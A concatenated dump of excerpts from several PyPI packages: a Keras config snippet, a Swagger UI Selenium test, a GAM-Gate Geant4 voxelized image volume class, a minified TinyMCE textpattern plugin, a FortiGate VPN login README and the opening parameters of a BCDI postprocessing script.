            "embeddings_constraint": constraints.serialize(
                self.embeddings_constraint
            ),
            "mask_zero": self.mask_zero,
            "input_length": self.input_length,
        }
        base_config = super().get_config()
        return dict(list(base_config.items()) + list(config.items()))
|
PypiClean
|
/keystack-0.12.0.tar.gz/keystack-0.12.0/Keystack/KeystackUI/static/swagger-ui-4.15.2/test/e2e-selenium/scenarios/features/parameter-example-rendering.js
|
describe("parameter example rendering", function () {
  describe("swagger 2.0", () => {
    beforeEach(function (client, done) {
      client
        .url("localhost:3230")
        .page.main()

      client.waitForElementVisible(".download-url-input:not([disabled])", 5000)
        .clearValue(".download-url-input")
        .setValue(".download-url-input", "/test-specs/features/example.swagger.yaml")
        .click("button.download-url-button")
        .waitForElementVisible(".opblock", 10000)
        .click("#operations-default-put_one")
        .waitForElementVisible("#operations-default-put_one.is-open", 5000)
      done()
    })
    afterEach(function (client, done) {
      done()
    })
    it("reveals a string parameter's example when viewing that parameter", function (client) {
      client.waitForElementVisible(".opblock-tag-section", 10000)
        .assert.containsText(".opblock-summary-path span", "/one")
        .click(".opblock")
        .waitForElementVisible(".opblock.is-open", 5000)
        .pause(500)
        .assert.containsText(`tr[data-param-name="ValidParam"]`, `12345`)
      client.end()
    })
  })
  describe("openapi 3.0", () => {
    beforeEach(function (client, done) {
      client
        .url("localhost:3230")
        .page.main()

      client.waitForElementVisible(".download-url-input:not([disabled])", 5000)
        .clearValue(".download-url-input")
        .setValue(".download-url-input", "/test-specs/features/example.openapi.yaml")
        .click("button.download-url-button")
        .waitForElementVisible(".opblock-summary-description", 10000)
        .click("#operations-agent-editAgent")
        .waitForElementVisible("#operations-agent-editAgent.is-open", 5000)
      done()
    })
    afterEach(function (client, done) {
      done()
    })
    // BUG FIX: the value assertion was wrapped in an `it()` declared inside
    // another `it()` callback, so the runner never executed it and the
    // OpenAPI 3.0 example value was never actually verified. Flattened into
    // a single test so the assertion runs.
    it("reveals a string parameter's example when viewing that parameter", function (client) {
      client
        .assert.value(
          `div.parameters-container > div > table > tbody > tr > td.col.parameters-col_description > input[type="text"]`,
          `12345`
        )
      client.end()
    })
  })
})
|
PypiClean
|
/gam-gate-0.3.5.tar.gz/gam-gate-0.3.5/gam_gate/geometry/ImageVolume.py
|
import gam_gate as gam
import gam_g4 as g4
import itk
import numpy as np
class ImageVolume(gam.VolumeBase):
    """
    Store information about a voxelized volume.

    The Geant4 geometry is built as a bounding box sliced by nested replicas
    (along Y, then X) and a parameterisation along Z, which lets Geant4
    describe a regular voxel grid without one physical volume per voxel.
    """
    # identifier used by the volume factory to select this volume type
    type_name = 'Image'
    @staticmethod
    def set_default_user_info(user_info):
        # initialize the common VolumeBase defaults, then the image-specific ones
        gam.VolumeBase.set_default_user_info(user_info)
        # filename of the input image (read with itk in construct())
        user_info.image = None
        # material of the bounding box and of voxels not matched by any interval
        user_info.material = 'G4_AIR'
        # list of [min_value, max_value, material_name] intervals
        # NOTE(review): initialize_image_parameterisation() reads row[0],
        # row[1] AND row[2], so this 2-element default looks incompatible
        # with it (IndexError if used as-is) -- confirm the expected format.
        user_info.voxel_materials = [[None, 'G4_AIR']]
        # optional filename: if set, the computed label image is written there
        user_info.dump_label_image = None
    def __init__(self, user_info):
        super().__init__(user_info)
        # the (itk) image, loaded in construct()
        self.image = None
        # the list of regions (kept here so the G4 objects stay referenced)
        self.g4_regions = []
    def __del__(self):
        # nothing to release explicitly
        pass
    def construct(self, vol_manager):
        # read image
        self.image = itk.imread(gam.check_filename_type(self.user_info.image))
        size_pix = np.array(itk.size(self.image)).astype(int)
        spacing = np.array(self.image.GetSpacing())
        size_mm = size_pix * spacing
        # shorter coding
        name = self.user_info.name
        # G4Box expects half-lengths, hence the divisions by 2 below
        hsize_mm = size_mm / 2.0
        hspacing = spacing / 2.0
        # build the bounding box volume
        self.g4_solid = g4.G4Box(name, hsize_mm[0], hsize_mm[1], hsize_mm[2])
        def_mat = vol_manager.find_or_build_material(self.user_info.material)
        self.g4_logical_volume = g4.G4LogicalVolume(self.g4_solid, def_mat, name)
        # param Y: slice the bounding box into size_pix[1] slabs along Y
        self.g4_solid_y = g4.G4Box(name + '_Y', hsize_mm[0], hspacing[1], hsize_mm[2])
        self.g4_logical_y = g4.G4LogicalVolume(self.g4_solid_y, def_mat, name + '_log_Y')
        self.g4_physical_y = g4.G4PVReplica(name + '_Y',
                                            self.g4_logical_y,
                                            self.g4_logical_volume,
                                            g4.EAxis.kYAxis,
                                            size_pix[1],  # nReplicas
                                            spacing[1],  # width
                                            0.0)  # offset
        # param X: slice each Y slab into size_pix[0] columns along X
        self.g4_solid_x = g4.G4Box(name + '_X', hspacing[0], hspacing[1], hsize_mm[2])
        self.g4_logical_x = g4.G4LogicalVolume(self.g4_solid_x, def_mat, name + '_log_X')
        self.g4_physical_x = g4.G4PVReplica(name + '_X',
                                            self.g4_logical_x,
                                            self.g4_logical_y,
                                            g4.EAxis.kXAxis,
                                            size_pix[0], spacing[0], 0.0)
        # param Z: one voxel-sized box, parameterised (material per copy) along Z
        self.g4_solid_z = g4.G4Box(name + '_Z', hspacing[0], hspacing[1], hspacing[2])
        self.g4_logical_z = g4.G4LogicalVolume(self.g4_solid_z, def_mat, name + '_log_Z')
        # the parameterisation needs the label image, built before G4PVParameterised
        self.initialize_image_parameterisation()
        self.g4_physical_z = g4.G4PVParameterised(name + '_Z',
                                                  self.g4_logical_z,
                                                  self.g4_logical_x,
                                                  g4.EAxis.kZAxis,  # g4.EAxis.kUndefined, ## FIXME ?
                                                  size_pix[2],
                                                  self.g4_voxel_param,
                                                  False)  # overlaps checking
        # find the mother's logical volume
        vol = self.user_info
        if vol.mother:
            st = g4.G4LogicalVolumeStore.GetInstance()
            mother_logical = st.GetVolume(vol.mother, False)
        else:
            mother_logical = None
        # consider the 3D transform -> helpers_transform.
        transform = gam.get_vol_g4_transform(vol)
        self.g4_physical_volume = g4.G4PVPlacement(transform,
                                                   self.g4_logical_volume,  # logical volume
                                                   vol.name,  # volume name
                                                   mother_logical,  # mother volume or None if World
                                                   False,  # no boolean operation
                                                   0,  # copy number
                                                   True)  # overlaps checking
        # construct region
        # not clear -> should we create region for all other LV ?
        # (seg fault if region for g4_logical_z)
        self.add_region(self.g4_logical_volume)
    def add_region(self, lv):
        # attach the logical volume lv to a (new or existing) G4 region
        name = lv.GetName()
        rs = g4.G4RegionStore.GetInstance()
        r = rs.FindOrCreateRegion(name)
        # keep a python reference so the region is not garbage collected
        self.g4_regions.append(r)
        lv.SetRegion(r)
        r.AddRootLogicalVolume(lv, True)
    def initialize_image_parameterisation(self):
        """
        From the input image, a label image is computed with each label
        associated with a material.
        The label image is initialized with label 0, corresponding to the first material.
        Correspondence from voxel value to material is given by a list of
        intervals [min_value, max_value, material_name]: all pixels with values
        between min (included) and max (non included) will be associated with
        the given material.
        """
        self.g4_voxel_param = g4.GamImageNestedParameterisation()
        # create image with same size
        info = gam.read_image_info(str(self.user_info.image))
        self.py_image = gam.create_3d_image(info.size, info.spacing, pixel_type='unsigned short', fill_value=0)
        # sort intervals of voxels_values <-> materials
        mat = self.user_info.voxel_materials
        interval_values_inf = [row[0] for row in mat]
        interval_values_sup = [row[1] for row in mat]
        interval_materials = [row[2] for row in mat]
        indexes = np.argsort(interval_values_inf)
        interval_values_inf = list(np.array(interval_values_inf)[indexes])
        interval_values_sup = list(np.array(interval_values_sup)[indexes])
        interval_materials = list(np.array(interval_materials)[indexes])
        # build the material
        for m in interval_materials:
            self.simulation.volume_manager.find_or_build_material(m)
        # compute list of labels and material
        self.final_materials = []
        # the image is initialized with the label zero, the first material
        self.final_materials.append(self.user_info.material)
        # convert interval to material id
        # NOTE: 'input' shadows the python builtin of the same name here
        input = itk.array_view_from_image(self.image)
        output = itk.array_view_from_image(self.py_image)
        # the final list of materials is packed (same label even if
        # there are several intervals with the same material)
        # NOTE(review): this reset discards the default material appended a few
        # lines above, so label 0 (uncovered voxels) ends up mapped to the first
        # interval material instead of user_info.material -- confirm intent.
        self.final_materials = []
        for inf, sup, m in zip(interval_values_inf, interval_values_sup, interval_materials):
            if m in self.final_materials:
                l = self.final_materials.index(m)
            else:
                self.final_materials.append(m)
                l = len(self.final_materials) - 1
            output[(input >= inf) & (input < sup)] = l
        # dump label image ?
        if self.user_info.dump_label_image:
            # keep the original image origin in the dumped file
            self.py_image.SetOrigin(info.origin)
            itk.imwrite(self.py_image, str(self.user_info.dump_label_image))
        # compute image origin so that the image is centered on (0, 0, 0)
        size_pix = np.array(itk.size(self.py_image))
        spacing = np.array(self.py_image.GetSpacing())
        orig = -(size_pix * spacing) / 2.0 + spacing / 2.0
        self.py_image.SetOrigin(orig)
        # send image to the cpp side
        gam.update_image_py_to_cpp(self.py_image, self.g4_voxel_param.cpp_edep_image, True)
        # initialize parametrisation
        self.g4_voxel_param.initialize_image()
        self.g4_voxel_param.initialize_material(self.final_materials)
|
PypiClean
|
/django_skote-0.0.9-py3-none-any.whl/django_skote/static/django_skote/libs/tinymce/plugins/textpattern/plugin.min.js
|
!function(){"use strict";var t=tinymce.util.Tools.resolve("tinymce.PluginManager"),u=function(){return(u=Object.assign||function(t){for(var n,r=1,e=arguments.length;r<e;r++)for(var o in n=arguments[r])Object.prototype.hasOwnProperty.call(n,o)&&(t[o]=n[o]);return t}).apply(this,arguments)};function a(t,n,r){if(r||2===arguments.length)for(var e,o=0,a=n.length;o<a;o++)!e&&o in n||((e=e||Array.prototype.slice.call(n,0,o))[o]=n[o]);return t.concat(e||Array.prototype.slice.call(n))}function n(e){return function(t){return r=typeof(n=t),(null===n?"null":"object"==r&&(Array.prototype.isPrototypeOf(n)||n.constructor&&"Array"===n.constructor.name)?"array":"object"==r&&(String.prototype.isPrototypeOf(n)||n.constructor&&"String"===n.constructor.name)?"string":r)===e;var n,r}}function e(){}function i(t){return function(){return t}}function o(t){return t}function r(){return m}var f=n("string"),c=n("object"),s=n("array"),l=i(!1),d=i(!0),m={fold:function(t,n){return t()},isSome:l,isNone:d,getOr:o,getOrThunk:g,getOrDie:function(t){throw new Error(t||"error: getOrDie called on none.")},getOrNull:i(null),getOrUndefined:i(void 0),or:o,orThunk:g,map:r,each:e,bind:r,exists:l,forall:d,filter:function(){return m},toArray:function(){return[]},toString:i("none()")};function g(t){return t()}function p(t,n){return-1<E.call(t,n)}function h(t,n){for(var r=t.length,e=new Array(r),o=0;o<r;o++){var a=t[o];e[o]=n(a,o)}return e}function v(t,n){for(var r=0,e=t.length;r<e;r++)n(t[r],r)}function y(t,n){for(var r=[],e=0,o=t.length;e<o;e++){var a=t[e];n(a,e)&&r.push(a)}return r}function b(t,e,o){return function(t){for(var n,r=t.length-1;0<=r;r--)n=t[r],o=e(o,n,r)}(t),o}function k(t,n){for(var r=0,e=t.length;r<e;++r)if(!0!==n(t[r],r))return;return 1}var O=function(r){function t(){return o}function n(t){return t(r)}var e=i(r),o={fold:function(t,n){return n(r)},isSome:d,isNone:l,getOr:e,getOrThunk:e,getOrDie:e,getOrNull:e,getOrUndefined:e,or:t,orThunk:t,map:function(t){return 
O(t(r))},each:function(t){t(r)},bind:n,exists:n,forall:n,filter:function(t){return t(r)?o:m},toArray:function(){return[r]},toString:function(){return"some("+r+")"}};return o},w={some:O,none:r,from:function(t){return null==t?m:O(t)}},C=Array.prototype.slice,E=Array.prototype.indexOf,x=Object.keys,R=Object.hasOwnProperty;function T(t){var n=[],r=[];return v(t,function(t){t.fold(function(t){n.push(t)},function(t){r.push(t)})}),{errors:n,values:r}}function P(t){return"inline-command"===t.type||"inline-format"===t.type}function N(t){return"block-command"===t.type||"block-format"===t.type}function S(o){function a(t){return ut.error({message:t,pattern:o})}function t(t,n,r){if(void 0===o.format)return void 0!==o.cmd?f(o.cmd)?ut.value(r(o.cmd,o.value)):a(t+" pattern has non-string `cmd` parameter"):a(t+" pattern is missing both `format` and `cmd` parameters");var e=void 0;if(s(o.format)){if(!k(o.format,f))return a(t+" pattern has non-string items in the `format` array");e=o.format}else{if(!f(o.format))return a(t+" pattern has non-string `format` parameter");e=[o.format]}return ut.value(n(e))}if(!c(o))return a("Raw pattern is not an object");if(!f(o.start))return a("Raw pattern is missing `start` parameter");if(void 0===o.end)return void 0!==o.replacement?f(o.replacement)?0===o.start.length?a("Replacement pattern has empty `start` parameter"):ut.value({type:"inline-command",start:"",end:o.start,cmd:"mceInsertContent",value:o.replacement}):a("Replacement pattern has non-string `replacement` parameter"):0===o.start.length?a("Block pattern has empty `start` parameter"):t("Block",function(t){return{type:"block-format",start:o.start,format:t[0]}},function(t,n){return{type:"block-command",start:o.start,cmd:t,value:n}});if(!f(o.end))return a("Inline pattern has non-string `end` parameter");if(0===o.start.length&&0===o.end.length)return a("Inline pattern has empty `start` and `end` parameters");var r=o.start,e=o.end;return 
0===e.length&&(e=r,r=""),t("Inline",function(t){return{type:"inline-format",start:r,end:e,format:t}},function(t,n){return{type:"inline-command",start:r,end:e,cmd:t,value:n}})}function M(t){return"block-command"===t.type?{start:t.start,cmd:t.cmd,value:t.value}:"block-format"===t.type?{start:t.start,format:t.format}:"inline-command"===t.type?"mceInsertContent"===t.cmd&&""===t.start?{start:t.end,replacement:t.value}:{start:t.start,end:t.end,cmd:t.cmd,value:t.value}:"inline-format"===t.type?{start:t.start,end:t.end,format:1===t.format.length?t.format[0]:t.format}:void 0}function A(t){return{inlinePatterns:y(t,P),blockPatterns:(n=y(t,N),r=function(t,n){return t.start.length===n.start.length?0:t.start.length>n.start.length?-1:1},(e=C.call(n,0)).sort(r),e)};var n,r,e}function B(){for(var t=[],n=0;n<arguments.length;n++)t[n]=arguments[n];var r=ft.console;r&&(r.error||r.log).apply(r,t)}function D(t){var n=t.getParam("forced_root_block","p");return!1===n?"":!0===n?"p":n}function I(t,n){return{container:t,offset:n}}function j(t){return t.nodeType===Node.TEXT_NODE}function _(t,n,r,e){void 0===e&&(e=!0);var o=n.startContainer.parentNode,a=n.endContainer.parentNode;n.deleteContents(),e&&!r(n.startContainer)&&(j(n.startContainer)&&0===n.startContainer.data.length&&t.remove(n.startContainer),j(n.endContainer)&&0===n.endContainer.data.length&&t.remove(n.endContainer),pt(t,o,r),o!==a&&pt(t,a,r))}function U(t,n){var r,e=n.get(t);return s(e)&&(0<(r=e).length?w.some(r[0]):w.none()).exists(function(t){return R.call(t,"block")})}function L(t){return 0===t.start.length}function V(t,n){var r=w.from(t.dom.getParent(n.startContainer,t.dom.isBlock));return""===D(t)?r.orThunk(function(){return w.some(t.getBody())}):r}function W(n){return function(t){return n===t?-1:0}}function q(t,n,r){if(j(t)&&0<=n)return w.some(I(t,n));var e=gt(ht);return w.from(e.backwards(t,n,W(t),r)).map(function(t){return I(t.container,t.container.data.length)})}function 
F(t,n,r){if(j(n)&&(r<0||r>n.data.length))return[];for(var e=[r],o=n;o!==t&&o.parentNode;){for(var a=o.parentNode,i=0;i<a.childNodes.length;i++)if(a.childNodes[i]===o){e.push(i);break}o=a}return o===t?e.reverse():[]}function G(t,n,r,e,o){return{start:F(t,n,r),end:F(t,e,o)}}function H(t,n){var r=n.slice(),e=r.pop(),o=r,a=function(t,n){return t.bind(function(t){return w.from(t.childNodes[n])})},i=w.some(t);return v(o,function(t,n){i=a(i,t)}),i.bind(function(t){return j(t)&&(e<0||e>t.data.length)?w.none():w.some({node:t,offset:e})})}function J(n,r){return H(n,r.start).bind(function(t){var o=t.node,a=t.offset;return H(n,r.end).map(function(t){var n=t.node,r=t.offset,e=document.createRange();return e.setStart(o,a),e.setEnd(n,r),e})})}function K(e,o,n){!function(t,n){if(j(t)&&t.length<=0)return w.some(I(t,0));var r=gt(ht);return w.from(r.forwards(t,0,W(t),n)).map(function(t){return I(t.container,0)})}(o,o).each(function(t){var r=t.container;yt(r,n.start.length,o).each(function(t){var n=e.createRng();n.setStart(r,0),n.setEnd(t.container,t.offset),_(e,n,function(t){return t===o})})})}function X(e,a){var i=e.dom,t=e.selection.getRng();return V(e,t).filter(function(t){var n=D(e),r=""===n&&i.is(t,"body")||i.is(t,n);return null!==t&&r}).bind(function(n){var r,e=n.textContent,t=a,o=(r=e).replace("\xa0"," ");return function(t,n,r){for(var e=0,o=t.length;e<o;e++){var a=t[e];if(n(a,e))return w.some(a);if(r(a,e))break}return w.none()}(t,function(t){return 0===r.indexOf(t.start)||0===o.indexOf(t.start)},l).map(function(t){return dt.trim(e).length===t.start.length?[]:[{pattern:t,range:G(i.getRoot(),n,0,n,0)}]})}).getOr([])}function z(t,n){return t.create("span",{"data-mce-type":"bookmark",id:n})}function Q(t,n){var r=t.createRng();return r.setStartAfter(n.start),r.setEndBefore(n.end),r}function Y(t,n,r){var e=J(t.getRoot(),r).getOrDie("Unable to resolve path 
range"),o=e.startContainer,a=e.endContainer,i=0===e.endOffset?a:a.splitText(e.endOffset),u=0===e.startOffset?o:o.splitText(e.startOffset);return{prefix:n,end:i.parentNode.insertBefore(z(t,n+"-end"),i),start:u.parentNode.insertBefore(z(t,n+"-start"),u)}}function Z(t,n,r){pt(t,t.get(n.prefix+"-end"),r),pt(t,t.get(n.prefix+"-start"),r)}function $(n,t,r){n.selection.setRng(r),"inline-format"===t.type?v(t.format,function(t){n.formatter.apply(t)}):n.execCommand(t.cmd,!1,t.value)}function tt(r,e,o){var a=r.selection.getRng();return!1===a.collapsed?[]:V(r,a).bind(function(t){var n=a.startOffset-(o?1:0);return Ot(r,e,a.startContainer,n,t)}).fold(function(){return[]},function(t){return t.matches})}function nt(p,t){var h,n,o,r,e,a,i;0!==t.length&&(h=p.dom,n=p.selection.getBookmark(),o=h,r=t,e=(new Date).getTime(),a="mce_textpattern_"+Math.floor(1e9*Math.random())+ ++bt+String(e),i=b(r,function(t,n){var r=Y(o,a+"_end"+t.length,n.endRng);return t.concat([u(u({},n),{endMarker:r})])},[]),v(b(i,function(t,n){var r=i.length-t.length-1,e=L(n.pattern)?n.endMarker:Y(o,a+"_start"+r,n.startRng);return t.concat([u(u({},n),{startMarker:e})])},[]),function(t){function n(t){return t===g}var r,e,o,a,i,u,f,c,s,l,d,m,g=h.getParent(t.startMarker.start,h.isBlock);L(t.pattern)?(e=t.pattern,o=t.endMarker,a=n,i=Q((r=p).dom,o),_(r.dom,i,a),$(r,e,i)):(u=p,f=t.pattern,c=t.startMarker,s=t.endMarker,l=n,d=u.dom,m=Q(d,s),_(d,Q(d,c),l),_(d,m,l),$(u,f,Q(d,{prefix:c.prefix,start:c.end,end:s.start}))),Z(h,t.endMarker,n),Z(h,t.startMarker,n)}),p.selection.moveToBookmark(n))}function rt(t,n){var r=tt(t,n.inlinePatterns,!0);0<r.length&&t.undoManager.transact(function(){nt(t,r)})}function et(t,n,r){for(var e=0;e<t.length;e++)if(r(t[e],n))return 1}function ot(n,r){var e=[",",".",";",":","!","?"],o=[32];n.on("keydown",function(t){13!==t.keyCode||lt.modifierPressed(t)||!function(o,t){if(o.selection.isCollapsed()){var 
a=tt(o,t.inlinePatterns,!1),u=X(o,t.blockPatterns);return(0<u.length||0<a.length)&&(o.undoManager.add(),o.undoManager.extra(function(){o.execCommand("mceInsertNewLine")},function(){var i,t,n;o.insertContent("\ufeff"),nt(o,a),i=o,0!==(t=u).length&&(n=i.selection.getBookmark(),v(t,function(t){return e=(n=i).dom,o=(r=t).pattern,a=J(e.getRoot(),r.range).getOrDie("Unable to resolve path range"),V(n,a).each(function(t){"block-format"===o.type?U(o.format,n.formatter)&&n.undoManager.transact(function(){K(n.dom,t,o),n.formatter.apply(o.format)}):"block-command"===o.type&&n.undoManager.transact(function(){K(n.dom,t,o),n.execCommand(o.cmd,!1,o.value)})}),1;var n,r,e,o,a}),i.selection.moveToBookmark(n));var r=o.selection.getRng(),e=q(r.startContainer,r.startOffset,o.dom.getRoot());o.execCommand("mceInsertNewLine"),e.each(function(t){var n=t.container;"\ufeff"===n.data.charAt(t.offset-1)&&(n.deleteData(t.offset-1,1),pt(o.dom,n.parentNode,function(t){return t===o.dom.getRoot()}))})}),1)}}(n,r.get())||t.preventDefault()},!0),n.on("keyup",function(t){et(o,t,function(t,n){return t===n.keyCode&&!1===lt.modifierPressed(n)})&&rt(n,r.get())}),n.on("keypress",function(t){et(e,t,function(t,n){return t.charCodeAt(0)===n.charCode})&&st.setEditorTimeout(n,function(){rt(n,r.get())})})}!function(i){if(!s(i))throw new Error("cases must be an array");if(0===i.length)throw new Error("there must be at least one case");var u=[],r={};v(i,function(t,e){var n=x(t);if(1!==n.length)throw new Error("one and only one name per case");var o=n[0],a=t[o];if(void 0!==r[o])throw new Error("duplicate key detected:"+o);if("cata"===o)throw new Error("cannot have a case named cata (sorry)");if(!s(a))throw new Error("case arguments must be an array");u.push(o),r[o]=function(){for(var r=[],t=0;t<arguments.length;t++)r[t]=arguments[t];var n=r.length;if(n!==a.length)throw new Error("Wrong number of arguments to case "+o+". 
Expected "+a.length+" ("+a+"), got "+n);return{fold:function(){for(var t=[],n=0;n<arguments.length;n++)t[n]=arguments[n];if(t.length!==i.length)throw new Error("Wrong number of arguments to fold. Expected "+i.length+", got "+t.length);return t[e].apply(null,r)},match:function(t){var n=x(t);if(u.length!==n.length)throw new Error("Wrong number of arguments to match. Expected: "+u.join(",")+"\nActual: "+n.join(","));if(!k(u,function(t){return p(n,t)}))throw new Error("Not all branches were specified when using match. Specified: "+n.join(", ")+"\nRequired: "+u.join(", "));return t[o].apply(null,r)},log:function(t){console.log(t,{constructors:u,constructor:o,params:r})}}}})}([{bothErrors:["error1","error2"]},{firstError:["error1","value2"]},{secondError:["value1","error2"]},{bothValues:["value1","value2"]}]);var at=function(r){return{isValue:d,isError:l,getOr:i(r),getOrThunk:i(r),getOrDie:i(r),or:function(t){return at(r)},orThunk:function(t){return at(r)},fold:function(t,n){return n(r)},map:function(t){return at(t(r))},mapError:function(t){return at(r)},each:function(t){t(r)},bind:function(t){return t(r)},exists:function(t){return t(r)},forall:function(t){return t(r)},toOptional:function(){return w.some(r)}}},it=function(r){return{isValue:l,isError:d,getOr:o,getOrThunk:function(t){return t()},getOrDie:function(){return t=String(r),function(){throw new Error(t)}();var t},or:o,orThunk:function(t){return t()},fold:function(t,n){return t(r)},map:function(t){return it(r)},mapError:function(t){return it(t(r))},each:e,bind:function(t){return it(r)},exists:l,forall:d,toOptional:w.none}},ut={value:at,error:it,fromOption:function(t,n){return t.fold(function(){return it(n)},at)}},ft="undefined"!=typeof window?window:Function("return 
this;")(),ct=[{start:"*",end:"*",format:"italic"},{start:"**",end:"**",format:"bold"},{start:"#",format:"h1"},{start:"##",format:"h2"},{start:"###",format:"h3"},{start:"####",format:"h4"},{start:"#####",format:"h5"},{start:"######",format:"h6"},{start:"1. ",cmd:"InsertOrderedList"},{start:"* ",cmd:"InsertUnorderedList"},{start:"- ",cmd:"InsertUnorderedList"}],st=tinymce.util.Tools.resolve("tinymce.util.Delay"),lt=tinymce.util.Tools.resolve("tinymce.util.VK"),dt=tinymce.util.Tools.resolve("tinymce.util.Tools"),mt=tinymce.util.Tools.resolve("tinymce.dom.DOMUtils"),gt=tinymce.util.Tools.resolve("tinymce.dom.TextSeeker"),pt=function(t,n,r){var e;n&&t.isEmpty(n)&&!r(n)&&(e=n.parentNode,t.remove(n),pt(t,e,r))},ht=mt.DOM,vt=function(t,r,e){if(!j(t))return w.none();var n=t.textContent;if(0<=r&&r<=n.length)return w.some(I(t,r));var o=gt(ht);return w.from(o.backwards(t,r,W(t),e)).bind(function(t){var n=t.container.data;return vt(t.container,r+n.length,e)})},yt=function(t,n,r){if(!j(t))return w.none();var e=t.textContent;if(n<=e.length)return w.some(I(t,n));var o=gt(ht);return w.from(o.forwards(t,n,W(t),r)).bind(function(t){return yt(t.container,n-e.length,r)})},bt=0,kt=function(e,o,a,t){var i,n,r,u,f,c,s,l=o.start;return n=t.container,r=t.offset,i=l,u=function(t,n){var r=t.data.substring(0,n),e=r.lastIndexOf(i.charAt(i.length-1)),o=r.lastIndexOf(i);return-1!==o?o+i.length:-1!==e?e+1:-1},f=a,s=gt(e,(c=e,function(t){return c.isBlock(t)||p(["BR","IMG","HR","INPUT"],t.nodeName)||"false"===c.getContentEditable(t)})),w.from(s.backwards(n,r,u,f)).bind(function(r){if(r.offset>=l.length){var t=e.createRng();return t.setStart(r.container,r.offset-l.length),t.setEnd(r.container,r.offset),w.some(t)}var n=r.offset-l.length;return vt(r.container,n,a).map(function(t){var n=e.createRng();return n.setStart(t.container,t.offset),n.setEnd(r.container,r.offset),n}).filter(function(t){return t.toString()===l}).orThunk(function(){return kt(e,o,a,I(r.container,0))})})},Ot=function(l,d,m,g,p){var 
h=l.dom;return q(m,g,h.getRoot()).bind(function(t){var n=h.createRng();n.setStart(p,0),n.setEnd(m,g);for(var r,e=n.toString(),o=0;o<d.length;o++){var a,i,u=d[o],f=u.end;i=r=void 0;if(a=(r=e).length-f.length,""===(i=f)||r.length>=i.length&&r.substr(a,a+i.length)===i){var c=d.slice();c.splice(o,1);var s=function(a,i,u){var f=a.dom,c=f.getRoot(),s=u.pattern,l=u.position.container,d=u.position.offset;return vt(l,d-u.pattern.end.length,i).bind(function(t){var r=G(c,t.container,t.offset,l,d);if(L(s))return w.some({matches:[{pattern:s,startRng:r,endRng:r}],position:t});var n=Ot(a,u.remainingPatterns,t.container,t.offset,i),e=n.getOr({matches:[],position:t}),o=e.position;return function(t,r,n,e,o,a){if(void 0===a&&(a=!1),0!==r.start.length||a)return q(n,e,o).bind(function(n){return kt(t,r,o,n).bind(function(t){if(a){if(t.endContainer===n.container&&t.endOffset===n.offset)return w.none();if(0===n.offset&&t.endContainer.textContent.length===t.endOffset)return w.none()}return w.some(t)})});var i=t.createRng();return i.setStart(n,e),i.setEnd(n,e),w.some(i)}(f,s,o.container,o.offset,i,n.isNone()).map(function(t){var n=G(c,t.startContainer,t.startOffset,t.endContainer,t.endOffset);return{matches:e.matches.concat([{pattern:s,startRng:n,endRng:r}]),position:I(t.startContainer,t.startOffset)}})})}(l,p,{pattern:u,remainingPatterns:c,position:t});if(s.isSome())return s}}return w.none()})};t.add("textpattern",function(r){var t,n,e,o=(t=function(){var t=r.getParam("textpattern_patterns",ct,"array");if(!s(t))return B("The setting textpattern_patterns should be an array"),{inlinePatterns:[],blockPatterns:[]};var n=T(h(t,S));return v(n.errors,function(t){return B(t.message,t.pattern),0}),A(n.values)}(),n=t,{get:function(){return n},set:function(t){n=t}});return ot(r,o),e=o,{setPatterns:function(t){var n=T(h(t,S));if(0<n.errors.length){var r=n.errors[0];throw new Error(r.message+":\n"+JSON.stringify(r.pattern,null,2))}e.set(A(n.values))},getPatterns:function(){return 
a(a([],h(e.get().inlinePatterns,M),!0),h(e.get().blockPatterns,M),!0)}}})}();
|
PypiClean
|
/fortigate-vpn-login-0.5.tar.gz/fortigate-vpn-login-0.5/README.md
|
# fortigate-vpn-login
Uses `openconnect` to connect to Fortinet VPNs, with extra features. This was created because sometimes we don't want
to use the Forticlient program, or just want a background daemon working for us.
So why not use `openconnect` alone? Because it has no proper SAML / OAuth2 support, so I decided to write a Python
wrapper that extracts the `SVPNCOOKIE` from the browser workflow and passes it to `openconnect`.
## Usage
To configure this utility in interactive mode, run:
```bash
fortigate-vpn-login --configure
```
To initiate the SAML login workflow against a FortiGate SSL VPN server:
```bash
fortigate-vpn-login -s https://vpn-server.example.com
```
To get help and more options:
```bash
fortigate-vpn-login -h
```
## Contents
- [ChangeLog](CHANGELOG.md)
## Setup and usage for local development
Make a virtual environment:
```bash
python3 -m venv venv
source venv/bin/activate
pip install -e .
```
Note that this will also install the local dependencies, which might change after
some time. If needed, you can run `pip install -e .` again to reinstall the
updated dependencies anytime.
|
PypiClean
|
/bcdi-0.3.1.tar.gz/bcdi-0.3.1/scripts/postprocessing/bcdi_angular_profile.py
|
# BCDI: tools for pre(post)-processing Bragg coherent X-ray diffraction imaging data
# (c) 07/2017-06/2019 : CNRS UMR 7344 IM2NP
# (c) 07/2019-present : DESY PHOTON SCIENCE
# authors:
# Jerome Carnis, [email protected]
import json
import os
import pathlib
import tkinter as tk
from numbers import Real
from tkinter import filedialog
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from scipy.interpolate import interp1d
from scipy.ndimage.measurements import center_of_mass
import bcdi.graph.graph_utils as gu
import bcdi.postprocessing.facet_recognition as fu
import bcdi.utils.format as fmt
import bcdi.utils.utilities as util
import bcdi.utils.validation as valid
helptext = """
This script allow to plot the width of a 2D object in function of the angle and a
modulus threshold defining the object from the background. Must be given as input:
the voxel size (possibly different in all directions), the angular step size and an
origin point where all linecuts pass by.
"""
# --------------------------------------------------------------------------- #
# User-defined parameters: edit the values below before running the script.   #
# The commented-out lines are alternative values kept for reference.          #
# --------------------------------------------------------------------------- #
datadir = (
    "D:/data/P10_2nd_test_isosurface_Dec2020/data_nanolab/dataset_1_no_psf/result/"
)
# "D:/data/P10_2nd_test_isosurface_Dec2020/data_nanolab/dataset_1_newpsf/result/"
# "D:/data/P10_2nd_test_isosurface_Dec2020/data_nanolab/" \
# "AFM-SEM/P10 beamtime P2 particle size SEM/"
# "D:/data/P10_2nd_test_isosurface_Dec2020/data_nanolab/dataset_1_newpsf/" \
# "PtNP1_00128/result/"  # data folder #
savedir = (
    datadir + "linecuts/refined0.25-0.55/test/"
)  # 'linecuts_P2_001a/valid_range/' #
# "D:/data/P10_2nd_test_isosurface_Dec2020/data_nanolab/AFM-SEM/" \
# "P10 beamtime P2 particle size SEM/linecuts_P2_001a/"
# results will be saved here, if None it will default to datadir
upsampling_factor = (
    5  # integer, 1=no upsampling_factor, 2=voxel size divided by 2 etc...
)
threshold = np.linspace(
    0.25, 0.55, num=11
)  # [0.471, 0.5, 0.526] # np.round(np.linspace(0.2, 0.5, num=10), decimals=3)
# number or list of numbers between 0 and 1,
